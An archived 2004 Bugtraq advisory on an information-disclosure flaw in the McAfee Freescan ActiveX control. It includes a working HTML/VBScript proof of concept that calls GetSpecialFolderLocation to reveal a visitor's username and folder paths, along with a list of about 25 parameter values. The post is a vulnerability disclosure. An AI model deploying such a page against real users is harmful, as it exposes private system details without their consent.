McAfee Freescan ActiveX Information Disclosure [Additional Details & PoC]

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: McAfee Freescan ActiveX Information Disclosure [Additional Details & PoC]
From: S G Masood <sgmasood@xxxxxxxxx>
Date: Wed, 7 Apr 2004 13:41:46 -0700 (PDT)
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

 
 

__________________________________
Do you Yahoo!?
Yahoo! Small Business $15K Web Design Giveaway 
http://promotions.yahoo.com/design_giveaway/


McAfee Freescan ActiveX Information Disclosure [Additional Details & PoC]
-------------------------------------------------------------------------



I. ABSTRACT:

McAfee Freescan is an online ActiveX based Antivirus utility.


II. DESCRIPTION:

I've been working on an information disclosure vulnerability in McAfee Freescan 
for a few days. However, Rafel Ivgi disclosed it publicly on 6th April 2004 
[1]. I have a few additional details to add to his original advisory.


III. IMPACT:

Disclosure of sensitive information to an unauthorised attacker.


IV. TECHNICAL DETAILS:

As Rafel Ivgi has mentioned in his advisory, there is a vulnerable method "BSTR 
GetSpecialFolderLocation(USERDEFINED eShellFolder)" which is provided by the 
ActiveX Control "McFreeScan.CoMcFreeScan.1" with classid 
"{EF791A6B-FC12-4C68-99EF-FB9E207A39E6}". This control is installed by the 
above mentioned product when it is used for the first time. 

When the vulnerable method is accessed with specific parameters, it discloses 
sensitive information about the victim's computer to the attacker including the 
current logged in username and the path of several "shell folders". Rafel, in 
his advisory mentioned only two of the parameters but, according to my 
research, several more parameters (about 25) are available which enable the 
attacker to gather more information.


V. Proof of Concept:

There are about 25 parameters that the "GetSpecialFolderLocation" method can 
take. This PoC lists all of them:


<OBJECT ID="MCFS" WIDTH=0 HEIGHT=0 
CLASSID="CLSID:EF791A6B-FC12-4C68-99EF-FB9E207A39E6"></OBJECT>

<script language=vbscript>

sPath = MCFS.GetSpecialFolderLocation(&H0000)

'Gets the path for the desktop folder.

document.write(sPath)

'The Available parameters for the method and their return values:
'
'&H0000=desktop
'&H0002=%username%start menu/programs
'&H0005=%username%/my documents
'&H0006=%username%/favorites
'&H0007=%username%start menu/programs/startup
'&H0008=%username%/recent
'&H0009=%username%/sendto
'&H0010=%username%/desktop
'&H0013=%username%/nethood
'&H0014=%windir%/fonts
'&H0015=%username%/templates
'&H0016=all users/start menu
'&H0017=all users/start menu/programs
'&H0018=all users/start menu/programs/startup
'&H0019=all users/desktop
'&H0020=%username%/Local Settings/Temporary Internet Files
'&H0021=%username%/cookies
'&H0022=%username%/local settings/history
'&H0023=All Users/Application Data
'&H0024=%windir%
'&H0025=%windir%/system32
'&H0026=%programfiles%
'&H0027=%username%/My Documents/My Pictures
'&H0028=%username%
'&H0029=%windir%

</script>


V. DISCLAIMER:

This advisory is meant only for the dissemination of information, alerting the 
general public about a security issue. Use this information at your own 
discretion.

In brief, the author is not responsible for any use, misuse, abuse of this 
information. Also, this information is provided "as is" without any warranty of 
any kind. 

*PHEW*

EOF

Prev by Date: Kerio Personal Firewall 4.0.13 - Remote DoS (Crash)
Next by Date: [OpenPKG-SA-2004.010] OpenPKG Security Advisory (tcpdump)
Previous by thread: Kerio Personal Firewall 4.0.13 - Remote DoS (Crash)
Next by thread: [OpenPKG-SA-2004.010] OpenPKG Security Advisory (tcpdump)
Index(es):
- Date
- Thread